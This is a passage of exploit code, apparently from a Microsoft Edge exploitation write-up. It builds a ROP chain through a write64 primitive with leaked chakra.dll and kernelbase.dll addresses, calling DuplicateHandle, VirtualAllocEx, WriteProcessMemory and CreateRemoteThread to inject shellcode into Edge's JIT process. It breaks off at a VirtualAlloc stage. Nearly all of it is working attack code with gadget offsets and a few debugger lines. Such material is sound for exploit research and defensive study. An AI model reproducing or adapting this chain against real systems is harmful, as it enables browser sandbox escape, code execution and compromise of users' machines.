write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)

write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38

// VirtualAlloc() ROP chain
// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

// DWORD flProtect (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28

// LPVOID lpAddress (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)

// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)

// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)

// Call KERNELBASE!VirtualAlloc
